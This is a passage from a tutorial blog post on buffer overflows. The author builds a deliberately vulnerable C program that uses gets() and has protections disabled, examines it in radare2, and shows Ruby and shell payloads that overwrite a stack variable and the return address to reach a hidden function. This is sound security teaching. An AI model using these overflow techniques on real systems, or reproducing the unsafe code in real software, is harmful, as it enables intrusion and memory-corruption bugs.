Understanding buffer overflows using Radare2
Jan 6 2020

Many people have heard about the perils of buffer overflows, but it's one thing to hear about them and another to build one yourself and play with it. In this post, we'll explore the basics of buffer overflows and create an example to understand them better.

We'll be using radare2, so if you need to install it, go ahead and read the instructions in their GitHub repository.

Let's start by creating a small program to analyse and exploit with a buffer overflow.

Building an exploitable executable

Buffer overflows have been on the radar for security researchers and compiler developers for a long time, but it's always fun to explore the topic. To make our exploration of buffer overflows easier, we are going to create our own program, so we don't spend too much time trying to figure out what the program does.

We are going to simulate a program that receives a bank account number and makes a fixed deposit (let's say 10 pounds). The program will also "simulate" having one more function that is currently not accessible from our main. Let's create a new file, bank_donation.c, with the following content:

#include <stdio.h>
#include <string.h>

int all_accounts_balance() {
        printf("ALL ACCOUNTS:\nBalance\n");
        return 0;
}

void deposit(char *account, int amount) {
        printf("Deposited: %d, into account: %s.\n", amount, account);
}

int main(int argc, char *argv[]){
        char account[8];
        int amount = 10;
        printf("Welcome to Shadee Bank\n");
        printf("Account number to deposit (8) digits: ");
        gets(account);
        deposit(account, amount);
        printf("Thanks, bye.\n");
        return 0;
}

Simple enough. We deposit ten pounds into the account, and that's it. There is no way for us to reach the all_accounts_balance function from main, which is fine for now.

As I mentioned before, buffer overflows have been studied for a long time, so it's no wonder that compilers' default settings create "safe" executables, or at least make the exploitation of buffer overflows harder. To begin, we are going to generate an exploitable executable by compiling our file with the following command:

$ gcc -no-pie -fno-stack-protector -o bank_donation bank_donation.c

I'll explain the -no-pie and -fno-stack-protector later after we have a little more context to understand them better. In the meantime, it's enough to know that it generates an executable that allows us easy access to study buffer overflows.

Alright, we now have the executable we'll work with. Time to get into radare2 and start exploring.

Explorations and exploitations

We can use radare2 to perform static and dynamic analysis. Static means we disassemble the code, read through it, and try to make sense of what the program does. Dynamic means we run the program in a debugger and see it in action. In my previous post, we did some static analysis when learning how to patch a binary using radare2. In this post, we'll do some dynamic analysis.

Let's start by running Radare in debug mode for our binary:

$ r2 -d bank_donation
>

We can now get more info about our binary. For example, we can show the symbol table using is:

> is
[Symbols]
# Removing some of the symbols to make the display cleaner
nth paddr       vaddr      bind   type   size name
――――――――――――――――――――――――――――――――――――――――――――――――――
1    0x00000238 0x00400238 LOCAL  SECT   0    .interp
2    0x00000254 0x00400254 LOCAL  SECT   0    .note.ABI-tag
...
48   0x00000577 0x00400577 GLOBAL FUNC   23   all_accounts_balance
...
52   0x0000058e 0x0040058e GLOBAL FUNC   44   deposit
...
62   0x000005ba 0x004005ba GLOBAL FUNC   104  main
...

In the symbol table, we can see the virtual addresses of our functions, which will come in handy. Let's now let Radare analyse the binary so it has more context and we get useful information when debugging.

> aaa
[x] Analyse all flags starting with sym. and entry0 (aa)
[x] Analyse function calls (aac)
[x] Analyse len bytes of instructions for references (aar)
[x] Check for objc references
[x] Check for vtables
[x] Type matching analysis for all functions (aaft)
[x] Propagate noreturn information
[x] Use -AA or aaaa to perform additional experimental analysis.

Alright, now let's set a breakpoint at main:

> db main 

Remember you can (and I strongly encourage you to do it) check the help for each command by adding a ? sign after the command.

Let's continue the execution of the program using dc.

> dc
hit breakpoint at: 4005ba

Ok, now the debugger has paused execution in our main function. Let's see its disassembly with pdf (print disassembly of function):

> pdf
  ; DATA XREF from entry0 @ 0x4004ad
  ;-- rax:
  ;-- rip:
┌ 104: int main (int argc, char **argv, char **envp);
│ ; var int64_t var_20h @ rbp-0x20
│ ; var int64_t var_14h @ rbp-0x14
│ ; var int64_t var_ch @ rbp-0xc
│ ; var int64_t var_4h @ rbp-0x4
│ ; arg int argc @ rdi
│ ; arg char **argv @ rsi
│ 0x004005ba b    55             push rbp
│ 0x004005bb      4889e5         mov rbp, rsp
│ 0x004005be      4883ec20       sub rsp, 0x20
│ 0x004005c2      897dec         mov dword [var_14h], edi    ; argc
│ 0x004005c5      488975e0       mov qword [var_20h], rsi    ; argv
│ 0x004005c9      c745fc0a0000.  mov dword [var_4h], 0xa
│ 0x004005d0      488d3d1b0100.  lea rdi, str.Welcome_to_Shadee_Bank ; 0x4006f2 ; "Welcome to Shadee Bank"
│ 0x004005d7      e884feffff     call sym.imp.puts           ; int puts(const char *s)
│ 0x004005dc      488d3d2d0100.  lea rdi, str.Account_number_to_deposit__8__digits: ; 0x400710 ; "Account number to deposit (8) digits: "
│ 0x004005e3      b800000000     mov eax, 0
│ 0x004005e8      e883feffff     call sym.imp.printf         ; int printf(const char *format)
│ 0x004005ed      488d45f4       lea rax, [var_ch]
│ 0x004005f1      4889c7         mov rdi, rax
│ 0x004005f4      b800000000     mov eax, 0
│ 0x004005f9      e882feffff     call sym.imp.gets           ; char *gets(char *s)
│ 0x004005fe      8b55fc         mov edx, dword [var_4h]
│ 0x00400601      488d45f4       lea rax, [var_ch]
│ 0x00400605      89d6           mov esi, edx
│ 0x00400607      4889c7         mov rdi, rax
│ 0x0040060a      e87fffffff     call sym.deposit
│ 0x0040060f      488d3d210100.  lea rdi, str.Thanks__bye.   ; 0x400737 ; "Thanks, bye."
│ 0x00400616      e845feffff     call sym.imp.puts           ; int puts(const char *s)
│ 0x0040061b      b800000000     mov eax, 0
│ 0x00400620      c9             leave
└ 0x00400621      c3             ret

In normal circumstances, you'll probably go step by step, figuring out what the program does, writing your comments, maybe pull pen and paper and write some interesting addresses to check, etcetera. But in our case, we are going to go straight to the interesting bits, so we don't get distracted by other details.

You might have seen a warning when you were compiling the code. The warning would say something like:

bank_donation.c:(.text+0x83): warning: the `gets' function is dangerous and should not be used.

We are going to check why that is the case, so let's add a breakpoint when we call gets.

> db 0x004005f9

Let's continue the execution and see what is going on:

> dc
Welcome to Shadee Bank
hit breakpoint at: 4005f9
>

Oh good, we got our welcome message. Let's see what's on our registers and what is going on on the stack:

> dr
rax = 0x00000000
rbx = 0x00000000
rcx = 0x00000000
rdx = 0x00000000
r8 = 0x7f4f81d294c0
r9 = 0x00000000
r10 = 0x00000003
r11 = 0x7f4f81780e80
r12 = 0x00400490
r13 = 0x7ffc7493e2b0
r14 = 0x00000000
r15 = 0x00000000
rsi = 0x00400710
rdi = 0x7ffc7493e1c4
rsp = 0x7ffc7493e1b0
rbp = 0x7ffc7493e1d0
rip = 0x004005f9
rflags = 0x00000202
orax = 0xffffffffffffffff
>  pxQ @ rsp
0x7ffc7493e1b0 0x00007ffc7493e2b8
0x7ffc7493e1b8 0x0000000100400490
0x7ffc7493e1c0 0x00007ffc7493e2b0
0x7ffc7493e1c8 0x0000000a00000000
0x7ffc7493e1d0 0x0000000000400630
0x7ffc7493e1d8 0x00007f4f8173db97
...
# removed to keep the output clean

Your addresses will probably be different, but you should see similar content on the stack. Let me add some comments to it:

 >  pxQ @ rsp
0x7ffc7493e1b0 0x00007ffc7493e2b8
0x7ffc7493e1b8 0x0000000100400490
0x7ffc7493e1c0 0x00007ffc7493e2b0
0x7ffc7493e1c8 0x0000000a00000000 # Our local variable amount with value 10!
0x7ffc7493e1d0 0x0000000000400630 # Previous RBP
0x7ffc7493e1d8 0x00007f4f8173db97 # Return address
...

A small detour to refresh how the calling convention in assembly works

I'm not going to explain the different types of calling conventions that exist or go into much detail. There is plenty of information on this out there. I'll just explain the basics so we can continue with our example. If you already know how the calling convention and the stack work together, skip to the next section.

In assembly when we call a function (main in our example) we add to the stack the address of the instruction to return to (the one after the call). Let's see an oversimplified example:

0x00001 mov eax, 1
0x00004 call my_func
0x00008 add ebx, eax
...
my_func:
0x00018 push ebp
0x0001c mov ebp, esp
0x00020 sub esp, 0x4
0x00024 add eax, 1
0x00028 mov esp, ebp
0x0002c leave
0x00030 ret

At address 0x00001 we move 1 into eax, and then we call our function. The function first stores the previous EBP on the stack (EBP marks where the stack frame of the current function begins) and sets EBP to the current stack pointer. We then subtract 0x4 from our stack pointer (ESP), giving us space for our local variables. We don't use the stack in our oversimplified function, so it's not necessary, but stay with me. We add 1 to eax and then remove the "space" we reserved on the stack for our local variables by setting our stack pointer back to the base pointer. Then we execute leave. The instruction leave is equivalent to:

mov esp, ebp
pop ebp

That leaves the stack precisely as it was when we entered our function. At the top of the stack, we'll find the address to return to. That address will be 0x00008 in our case, right after the call to my_func.

What happened here is that we stored information on our stack so the program can call the function and make use of the stack and registers, and then restore to the state that the stack was previous to the call.

Let's see how the stack looked in our trivial example, before the call (I'll assume the stack starts at 0x1010):

0x1010 0x00FFF # EBP
0x100c 0x00000 # local variable One with value zero
0x1008 ....... #Nothing yet but the Stack pointer (ESP) points here.

When we call our function, our stack looks like this:

0x1010 0x00FFF # EBP
0x100c 0x00000 # local variable One with value zero
0x1008 0x00008 # The address of the instruction right after the call to my_func
0x1004 ....... #Nothing yet but the Stack pointer (ESP) points here.

We land on the function at address 0x00018:

my_func:
0x00018 push ebp        # <= Executing this
0x0001c mov ebp, esp
0x00020 sub esp, 0x4
0x00024 add eax, 1
0x00028 mov esp, ebp
0x0002c leave
0x00030 ret

So we push the EBP into the stack, so our stack looks like this:

0x1010 0x00FFF # EBP still points here
0x100c 0x00000 # local variable One with value zero
0x1008 0x00008 # The address of the instruction right after the call to my_func
0x1004 0x1010  # Stores the EBP of the previous frame
0x1000 ....... # Nothing yet but the Stack pointer (ESP) points here.

We now set our EBP to be where ESP is currently located at:

my_func:
0x00018 push ebp
0x0001c mov ebp, esp    # <= Executing this
0x00020 sub esp, 0x4
0x00024 add eax, 1
0x00028 mov esp, ebp
0x0002c leave
0x00030 ret

Our stack now looks like this:

0x1010 0x00FFF # Base of the previous frame
0x100c 0x00000 # local variable One with value zero
0x1008 0x00008 # The address of the instruction right after the call to my_func
0x1004 0x1010  # Stores the EBP of the previous frame
0x1000 ....... # EBP and ESP point here

Execute sub esp, 0x4 to reserve some space for our local variables, so our Stack looks like this:

0x1010 0x00FFF # Base of the previous frame
0x100c 0x00000 # local variable One with value zero
0x1008 0x00008 # The address of the instruction right after the call to my_func
0x1004 0x1010  # Stores the EBP of the previous frame
0x1000 ....... # EBP points here
0x0FFc ....... # ESP points here

We add one to eax and then start with the clean-up of our function. We "free" the space we had reserved for our local variables by returning the ESP to the base of our frame (EBP).

0x1010 0x00FFF # Base of the previous frame
0x100c 0x00000 # local variable One with value zero
0x1008 0x00008 # The address of the instruction right after the call to my_func
0x1004 0x1010  # Stores the EBP of the previous frame
0x1000 ....... # EBP and ESP point here

We now execute leave:

my_func:
0x00018 push ebp
0x0001c mov ebp, esp
0x00020 sub esp, 0x4
0x00024 add eax, 1
0x00028 mov esp, ebp
0x0002c leave           # <= Executing this
0x00030 ret

And our stack looks like this:

0x1010 0x00FFF # EBP points here again
0x100c 0x00000 # local variable One with value zero
0x1008 0x00008 # The address of the instruction right after the call to my_func
0x1004 ....... # ESP points here

leave popped the value that was on the top of our stack, 0x1010, back into EBP. Now we only have ret left, which will pop what is on the top of our stack, in our case 0x00008, and continue the execution there:

0x00001 mov eax, 1
0x00004 call my_func
0x00008 add ebx, eax    # <= Back here
...
my_func:
0x00018 push ebp
0x0001c mov ebp, esp
0x00020 sub esp, 0x4
0x00024 add eax, 1
0x00028 mov esp, ebp
0x0002c leave
0x00030 ret

And our stack is as we had it before the call. I hope that was a helpful refresher on how the stack works. If you would like to know more, have a look at Open Security Training Intro to x86.
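If you prefer to poke at this in code, here is a toy Ruby model of the same sequence. It's a sketch, not an emulator: the ToyMachine class and its method names are made up for this post. One difference from the diagrams above: it follows the real x86 convention where ESP points at the last value pushed, so its ESP values sit one slot (4 bytes) higher than the ones drawn in the diagrams.

```ruby
# Toy model of a 32-bit stack: just enough to follow call, the function
# prologue, leave and ret. All names here are hypothetical.
class ToyMachine
  attr_reader :esp, :ebp, :eip, :memory

  def initialize(esp:, ebp:)
    @esp = esp
    @ebp = ebp
    @eip = 0
    @memory = {} # address => 32-bit value
  end

  def push(value)
    @esp -= 4
    @memory[@esp] = value
  end

  def pop
    value = @memory.fetch(@esp)
    @esp += 4
    value
  end

  # call: push the address of the next instruction, then jump.
  def call(target, return_to)
    push(return_to)
    @eip = target
  end

  # push ebp; mov ebp, esp; sub esp, locals
  def prologue(locals)
    push(@ebp)
    @ebp = @esp
    @esp -= locals
  end

  # leave: mov esp, ebp; pop ebp
  def leave
    @esp = @ebp
    @ebp = pop
  end

  # ret: pop the return address into the instruction pointer.
  def ret
    @eip = pop
  end
end

m = ToyMachine.new(esp: 0x100c, ebp: 0x1010)
m.call(0x18, 0x08) # call my_func, return address is 0x00008
m.prologue(4)      # push ebp; mov ebp, esp; sub esp, 0x4
m.leave
m.ret
puts format("eip=0x%x esp=0x%x ebp=0x%x", m.eip, m.esp, m.ebp)
```

Running it shows execution resuming at 0x8, with ESP and EBP back at the values they had before the call. If something overwrote the slot holding the return address (m.memory[0x1008] in this model) before ret runs, eip would end up at whatever value was written there instead.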

Let's get back to our example.

Looking at our stack

Remember where we left off? We were debugging our program in Radare2, and we set a breakpoint right before the call to gets, the "dangerous" function from the compiler warning. And we were looking at our stack.

 >  pxQ @ rsp
0x7ffc7493e1b0 0x00007ffc7493e2b8
0x7ffc7493e1b8 0x0000000100400490
0x7ffc7493e1c0 0x00007ffc7493e2b0
0x7ffc7493e1c8 0x0000000a00000000 # Our local variable amount with value 10
0x7ffc7493e1d0 0x0000000000400630 # Previous RBP
0x7ffc7493e1d8 0x00007f4f8173db97 # Return address
...

We have a local variable here, with the value of 10 (0xA in hex). Alright, let's execute the next instruction and check the stack after (I'll add characters instead of digits, so they are easier to spot on the stack):

> dsu 0x004005fe
Account number to deposit (8) digits: AAAAAAB
>

We used dsu (step until) to run until the instruction right after the call to gets. Let's examine the stack:

> pxQ @ rsp
0x7ffc7493e1b0 0x00007ffc7493e2b8
0x7ffc7493e1b8 0x0000000100400490
0x7ffc7493e1c0 0x414141417493e2b0
0x7ffc7493e1c8 0x0000000a00424141
0x7ffc7493e1d0 0x0000000000400630
0x7ffc7493e1d8 0x00007f4f8173db97
...

0x41 represents the letter A and 0x42 represents the letter B, so you can see that we have: Six letters "A", one letter B, and one Null (0x00 to terminate the string). After that, we see 0xA, which is our amount 10.
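To double-check that reading of the dump, here is a small Ruby sketch that unpacks the two quadwords printed by pxQ back into bytes in the order they sit in memory. x86-64 is little-endian, so the least significant byte of each quadword is the one at the lowest address. The helper names quad_bytes and decode_locals are made up for this example, and the offsets assume the frame layout shown by pdf (account at rbp-0xc, amount at rbp-0x4).

```ruby
# Split a 64-bit value from the pxQ output into its 8 bytes,
# lowest address first (little-endian order).
def quad_bytes(value)
  [value].pack("Q<").bytes
end

# Recover account and amount from the quadwords at 0x...1c0 and 0x...1c8.
def decode_locals(quad_at_1c0, quad_at_1c8)
  low  = quad_bytes(quad_at_1c0)
  high = quad_bytes(quad_at_1c8)
  # account starts at 0x...1c4: the last 4 bytes of the first quadword
  # plus the first 4 bytes of the second one.
  account = (low[4, 4] + high[0, 4]).pack("C*")
  # amount lives at 0x...1cc: the last 4 bytes of the second quadword.
  amount = high[4, 4].pack("C*").unpack1("V")
  [account, amount]
end

account, amount = decode_locals(0x414141417493e2b0, 0x0000000a00424141)
puts "account bytes: #{account.inspect}"
puts "amount: #{amount}"
```

The account bytes come out as six A characters, a B and the terminating NUL, and the amount is still 10.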

What if we wanted to change that value to something else? Let's say what if we wanted to deposit 50 pounds instead of ten. We could do it by making the account number "overflow" its designated space and start writing on other parts of our stack.

50 in hex is 0x32, so let's make that our input!

Overflowing the stack

On a different shell, we'll execute the command and add the additional characters. We know that "A" is 0x41 but how do we write 0x32? If we check the man page of ASCII we see that 0x32 is "2", so that is easy:

$ ./bank_donation
Welcome to Shadee Bank
Account number to deposit (8) digits: AAAAAAB 2
Deposited: 50, into account: AAAAAAB 2.
Thanks, bye.

Oh!

What if we only wanted to deposit 8 pounds? Here we have a problem: if you check the ASCII man page, you'll see that to get decimal 8 (hex 0x08) we need the backspace character. But we can't type a backspace without deleting the letters, so how do we do it?

With a little help from my friends

When doing reverse engineering, you'll need to get familiar with a scripting language. In the end, it doesn't matter which, each one has its advantages and drawbacks. So just pick one, and wield it like a pro. We can use any scripting language you prefer. I like ruby, so that's what I'll show first:

$ ruby -e 'print "A"*6; print "B\x00\x08"' | ./bank_donation
Welcome to Shadee Bank
Account number to deposit (8) digits: Deposited: 8, into account: AAAAAAB.
Thanks, bye.

But you can use any other tool or scripting language you prefer:

$ echo -e   "AAAAAAB\x00\x08" | ./bank_donation
$ printf "AAAAAAB\x00\x08" | ./bank_donation
$ perl -e 'print "A" x 6 . "B\x00\x08"' | ./bank_donation
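The one-liners above hardcode the bytes for 8 pounds. As a rough sketch, the same idea can be wrapped in a small Ruby helper that builds the input for other amounts. The name amount_payload and the BUFFER_SIZE constant are made up for this example, and it assumes the layout we saw in the dump: the 8-byte account buffer immediately followed by the 4-byte amount.

```ruby
BUFFER_SIZE = 8 # char account[8] in bank_donation.c

# Build input that fills account and then overwrites amount.
# Assumes amount sits right after the 8-byte buffer, as in the dump above.
def amount_payload(amount, account = "AAAAAAB")
  raise ArgumentError, "account too long" if account.bytesize > BUFFER_SIZE
  raise ArgumentError, "amount out of range" unless (0...2**32).cover?(amount)

  # Pad the account with NUL bytes up to the end of the buffer.
  filler = account.b.ljust(BUFFER_SIZE, "\x00".b)

  # 32-bit little-endian value. Trailing zero bytes are dropped: gets()
  # appends its own NUL, and the rest of amount is already zero because
  # the original value is 10. An amount that needs all four bytes would
  # push that NUL into the saved RBP.
  bytes = [amount].pack("V").bytes
  bytes.pop while bytes.size > 1 && bytes.last.zero?
  payload = filler + bytes.pack("C*")

  # gets() stops reading at a newline, so 0x0a can't be part of the input.
  raise ArgumentError, "payload contains a newline byte" if payload.bytes.include?(0x0a)

  payload
end

puts amount_payload(8).inspect
puts amount_payload(50, "AAAAAAB ").inspect
```

To feed the result to the program, you could swap the puts line for print amount_payload(8) and pipe the script into ./bank_donation. Note the newline check: an amount whose bytes include 0x0a (such as 10 itself) can't be written this way, because gets would stop reading there.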

Alright, we did it! We took advantage of a buffer overflow. What else can be done?

Changing the flow

Remember what we had in our stack? We had this:

 >  pxQ @ rsp
0x7ffc7493e1b0 0x00007ffc7493e2b8 r13+8 
0x7ffc7493e1b8 0x0000000100400490
0x7ffc7493e1c0 0x00007ffc7493e2b0 r13
0x7ffc7493e1c8 0x0000000a00000000         # Our local variable amount with value 10!
0x7ffc7493e1d0 0x0000000000400630 sym.__libc_csu_init # Previous RBP
0x7ffc7493e1d8 0x00007f4f8173db97                     # Return address
...

We managed to overwrite the upper half of the quadword at 0x7ffc7493e1c8, which held 0x0000000a, the amount of ten we set in the program.

What happens if we keep writing until we reach 0x7ffc7493e1d8?

That is the return address. We could replace that return address and change it to be the address of our function: all_accounts_balance. Let's do just that.
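Before building that input, it helps to work out how far each slot is from the start of account. Here is a minimal Ruby sketch of that arithmetic, using the rbp-relative offsets from the pdf output (var_ch and var_4h) plus the usual positions of the saved RBP and the return address. The constant and method names are made up for this example.

```ruby
# Frame layout of main, as offsets relative to rbp.
ACCOUNT_AT     = -0xc # var_ch, char account[8]
AMOUNT_AT      = -0x4 # var_4h, int amount
SAVED_RBP_AT   = 0x0  # written by "push rbp"
RETURN_ADDR_AT = 0x8  # pushed by the call into main

# Number of bytes gets() has to write before it reaches a given slot.
def distance_from_account(slot_offset)
  slot_offset - ACCOUNT_AT
end

slots = {
  "amount"         => AMOUNT_AT,
  "saved rbp"      => SAVED_RBP_AT,
  "return address" => RETURN_ADDR_AT
}

slots.each do |name, offset|
  puts "#{name}: #{distance_from_account(offset)} bytes past the start of account"
end
```

This gives 8 bytes to reach amount, 12 to reach the saved RBP and 20 to reach the return address, which matches the addresses in the dump: 0x7ffc7493e1d8 minus 0x7ffc7493e1c4 is 0x14.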

Debugging in radare2 like a champ

We previously did a debug run using Radare's REPL (Read Eval Print Loop), sometimes that is enough, but r2 also provides a "visual" debugger that offers more visibility into what is going on.

Every time we wanted to check the stack we had to run the command pxQ @ rsp, what if I told you that you could see the stack changes going on "live" and your registers at the same time? That would be great, right? Enter, V! (visual mode).

Let's reopen the executable:

> ood
# analyse the code
> aaa
# set a breakpoint to main
> db main
# continue executing until next breakpoint
> dc
# Enter Visual mode
> v!

That should show you a view with different sections. You'll see something similar to the following image:

[Image: radare2 visual interface]

The graphic interface tries to accommodate both mouse users and keyboard users, but it ends up somewhere in the middle, and I'm still unsure whether that's successful or not.

Anyways, it is useful for certain tasks. Like viewing the stack change with every step of the debug.

Let me try to explain the interface.

  1. Menu items accessible by pressing m or clicking. You can use your arrows once you've activated the menu. (Or use vim navigation h, j, k, and l).
  2. You can see that the interface supports multiple tabs. Each tab can have a different layout. You can enter the tab mode using t.
  3. You can view the disassembly of the current program. You can also add comments here; the comment is attached to the top line of the current panel.
  4. You can see the Instruction Pointer (rip) and can hit s to step or S to step-over.
  5. You can see the stack on the next panel. Remember you can edit the command being run on the panel by pressing e. For example, I sometimes change it to pxQ 128@ rsp, which displays the stack as 64-bit values in a way that is clearer to me.
  6. You can have as many panels as you want. You can split panels using - to split horizontally, and | to split them vertically. Find a configuration that is useful for you.
  7. You can switch to graph mode using [space]. As with other panels you can use vim's navigation h to move right, l to move left, j down, and k up.

Let me give you some general tips. Be careful where you click on the interface. Don't use the mouse to "select" (or switch) a panel; use tab to change panels instead. Radare will assume you are selecting the element you clicked and, depending on the current panel type, it'll highlight it or try to show/jump to it on your current panel or the first panel. Use ? to see what options you have for each panel or mode. The graphic interface has different modes: command mode, window mode, graph mode, and "panel" mode. I encourage you to play around with the panels, read the help, and try to customise them to your heart's content. One of the most useful commands for the panels is e, which lets you change the command being run on the panel. And finally, you can close a panel by pressing X (capital X).

Alright, that was a very brief introduction to radare2's graphical interface. A very long post could be written about it, but this is not that post. If you want to learn more, you should check the radare2 book.

You'll probably learn a lot by playing with the visual interface for a couple of hours. An ounce of practice is worth a pound of reading (or something like that).

Let's go back to our example.

Working with stdin and stdout

We have loaded the executable to Radare and are ready to start debugging. There is something that we have to sort out before we continue debugging. So, quit Radare, we'll start again soon.

Let me explain. In visual mode, many things are going on at the same time, and this causes problems when reading from STDIN (Standard Input) or writing to STDOUT (Standard Output). There is no easy way to distinguish what goes to the debugged program and what goes to radare2. When we were using the radare2 REPL, it was easier to stop the REPL and read from STDIN for the program we were debugging. In visual mode, we have to work around it.

The good news is that Radare provides a nice utility to execute a program and tweak its inputs and outputs. The utility's name is rarun2. We can create a Rarun script and tell r2 to execute that script to run our debugged program.

There are a few interesting ways to handle the input and output of a program. For example, we could use another terminal as the stdio for the debugged program. Let's get that terminal's device path by using the tty command:

$ tty
# you'll get something like:
# /dev/pts/0

Now, let's create a rarun2 script, name it tty.rr2 and add the following content:

#!/usr/bin/env rarun2
stdio=/dev/pts/0

This makes the debugged program use the other terminal for its input and output.

To prevent the shell running on the terminal from getting confused between commands for the shell and commands for the program we are going to run on r2 we'll run the command sleep for a long time. The shell will ignore any input while it is sleeping, preventing it from trying to execute what we are typing.

Let's do a test run. On the terminal where we ran tty, run sleep 99999:

$ sleep 99999

Now on the terminal where we are going to run r2, execute it with the following command:

$ r2 -e dbg.profile=tty.rr2 -d bank_donation
>
# Let's analyse the code
> aaa
# let's create a breakpoint at main
> db main
# and let it continue
> dc

If you check your other terminal, you won't be seeing anything at the moment. It might be useful to put the two terminals side by side. Now hit continue again on the debugger:

> dc

And now you'll see the output correctly displayed on the other terminal :).

Experiment with it for a while, so you get the hang of it, exit when finished (you can Ctrl+c to stop the sleep).

I believe you can see how this can be useful, but we get the same problem when we want to add non-visible characters like BackSpace. How do we overcome that problem?

Well, it's not that hard. You know that stdin and stdout are only file descriptors. So we can set a file to be the stdin for the command and another file to be the stdout. Let's create another rarun2 script file with a different configuration. Let's call it files.rr2 and add the following content:

#!/usr/bin/env rarun2
stdin=stdin.txt
stdout=stdout.txt

We can create our stdin.txt and stdout.txt with the following commands:

$ ruby -e 'print "A"*6; print "B\x00\x08"' > stdin.txt
$ touch stdout.txt
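If you find yourself recreating these files often, the steps can be scripted. The following Ruby sketch writes the input file, an empty output file and the rarun2 profile into a directory of your choice. The function name write_debug_files is made up, it only emits the stdin= and stdout= directives used in this post, and it writes absolute paths into the profile instead of the relative ones shown above.

```ruby
require "tmpdir"

# Write stdin.txt, stdout.txt and files.rr2 into dir.
# Returns the path of the rarun2 profile.
def write_debug_files(dir, payload)
  stdin_path   = File.join(dir, "stdin.txt")
  stdout_path  = File.join(dir, "stdout.txt")
  profile_path = File.join(dir, "files.rr2")

  # binwrite keeps the NUL and backspace bytes exactly as they are.
  File.binwrite(stdin_path, payload)
  # Same effect as `touch stdout.txt` for a file that doesn't exist yet.
  File.write(stdout_path, "")
  File.write(profile_path, <<~PROFILE)
    #!/usr/bin/env rarun2
    stdin=#{stdin_path}
    stdout=#{stdout_path}
  PROFILE

  profile_path
end

# Demo in a throwaway directory; use Dir.pwd to write next to the binary.
Dir.mktmpdir do |dir|
  profile = write_debug_files(dir, "AAAAAAB\x00\x08".b)
  puts File.read(profile)
end
```

The demo only prints the generated profile. To actually use it, call write_debug_files(Dir.pwd, ...) and pass the resulting files.rr2 to r2 through dbg.profile, as shown in the next step.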

Now on a different terminal, we can keep a tail -f running on stdout to see the output of the program. We don't have to do anything with the input. It'll be taken from stdin.txt.

We can have tail running on one of the terminals:

$ tail -f stdout.txt

And on our working terminal, we can now run r2:

$ r2 -e dbg.profile=files.rr2 -d bank_donation
>
# Let's analyse the code
> aaa
# let's create a breakpoint at main
> db main
# and let it continue
> dc

We can see that nothing is displayed on the tail terminal. We can now tell the program to continue and we'll see all the output on the terminal.

> dc

After that, we'll be able to see the output on the terminal running the tail command.

Now we can debug our program without having to worry about the inputs and outputs. You can restart the debugger. We are going to do two more debugging runs, and we are done.

Visual debugging

The post is long enough now, so we are going to hurry up and do one last modification to the stack. We are going to first see what is going on on the stack using the visual debugger, and then fix our input to change the program flow.

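I've been having trouble seeing the output in stdout.txt, most likely because C's standard I/O buffers output that goes to a file and only writes it out when the buffer fills or the program exits normally. So we are going to use another terminal to display what is going on. Find out the new terminal's device path with tty, and use that in files.rr2. This is my files.rr2 script: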

#!/usr/bin/env rarun2
stdin=stdin.txt
stdout=/dev/pts/0

On the terminal where I ran tty and got /dev/pts/0, I'll run sleep, so it doesn't get messy with the shell output:

$ sleep 999999

If you haven't created stdin.txt you can create it with the following command:

$ ruby -e 'print "A"*6 + "B\x00\x08"' > stdin.txt

And now on my working terminal, I'll run r2:

$ r2 -e dbg.profile=files.rr2 -d bank_donation
>
# analyse the code
> aaa
# set a breakpoint at main
> db main
# let it continue until the breakpoint
> dc

Now let's go into visual mode:

> v!

This should open the panels. You should see your stack and the registers on your right panels and the disassembly on the left panel.

We are going to add a couple of breakpoints so we can inspect the stack. Click or navigate to Debug > Breakpoints add one at:

Alright, click continue (Debug > Continue). I'll show my stack; your addresses might be different, but you'll get the idea. This is my stack right before the gets. We can see that the quadword at address 0x7fff49c80228 holds the 0xa, which represents the 10 "pounds" we defined first.

0x7fff49c80210 0x00007fff49c80318
0x7fff49c80218 0x0000000100400490
0x7fff49c80220 0x00007fff49c80310
0x7fff49c80228 0x0000000a00000000
0x7fff49c80230 0x0000000000400630
0x7fff49c80238 0x00007f8e88dfcb97
0x7fff49c80240 0x0000000000000001
0x7fff49c80248 0x00007fff49c80318
0x7fff49c80250 0x0000000100008000
0x7fff49c80258 0x00000000004005ba
0x7fff49c80260 0x0000000000000000
0x7fff49c80268 0x051078b997922958
0x7fff49c80270 0x0000000000400490
0x7fff49c80278 0x00007fff49c80310
0x7fff49c80280 0x0000000000000000
0x7fff49c80288 0x0000000000000000

Let's hit continue and let's check the stack again:

0x7fff49c80210 0x00007fff49c80318
0x7fff49c80218 0x0000000100400490
0x7fff49c80220 0x4141414149c80310
0x7fff49c80228 0x0000000800424141 ; Now we have 8 instead of 10
0x7fff49c80230 0x0000000000400630
0x7fff49c80238 0x00007f8e88dfcb97 ; Return address after main
0x7fff49c80240 0x0000000000000001
0x7fff49c80248 0x00007fff49c80318
0x7fff49c80250 0x0000000100008000
0x7fff49c80258 0x00000000004005ba
0x7fff49c80260 0x0000000000000000
0x7fff49c80268 0x051078b997922958
0x7fff49c80270 0x0000000000400490
0x7fff49c80278 0x00007fff49c80310
0x7fff49c80280 0x0000000000000000
0x7fff49c80288 0x0000000000000000

We overwrote the amount with eight. But have a look at address 0x7fff49c80238: that is the return address we'll jump to after finishing main. What if we keep on writing and replace that address with the address of the function all_accounts_balance? You can see the address by running is in r2. Go to command mode by pressing colon (:) and type is; you'll see the address somewhere in the output:

Pro tip: (Thanks @JaroslavNahorny, this is very useful!)

You can use the Radare grep operator (~) to filter the results. You should check the help to view all the options (~?).

> is ~ all_accounts
0x00000577 0x00400577 GLOBAL FUNC   23   all_accounts_balance

You can quit command mode by typing q and hit enter.

Let's quit r2 altogether so we can change our stdin.txt.

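Let's recreate our stdin.txt with the correct input that will overwrite the return address. The buffer starts at rbp-0xc and the return address sits at rbp+0x8, which is 20 bytes later. Our input so far is 9 bytes long, so we need to write 11 more bytes to reach the return address and another 8 to overwrite it completely. Since x86-64 is little-endian, we write the address 0x00400577 starting with its lowest byte. So we'll generate the input like this: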

$ ruby -e 'print "A"*6 + "B\x00\x08" + "\x00"*11 + "\x77\x05\x40" + "\x00"*5' > stdin.txt
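The same input can be built without counting bytes by hand. This is a rough Ruby sketch under the assumptions from this post: the return address sits 20 bytes past the start of account, and the target is the vaddr that is printed for all_accounts_balance. The names return_payload and RETURN_ADDR_DISTANCE are made up for this example.

```ruby
# Distance from the start of account (rbp-0xc) to the return address (rbp+0x8).
RETURN_ADDR_DISTANCE = 20

# Build the input: the prefix used so far, NUL padding up to the saved
# return address, then the new address as 8 little-endian bytes.
def return_payload(target, prefix = "AAAAAAB\x00\x08")
  prefix = prefix.b
  raise ArgumentError, "prefix too long" if prefix.bytesize > RETURN_ADDR_DISTANCE

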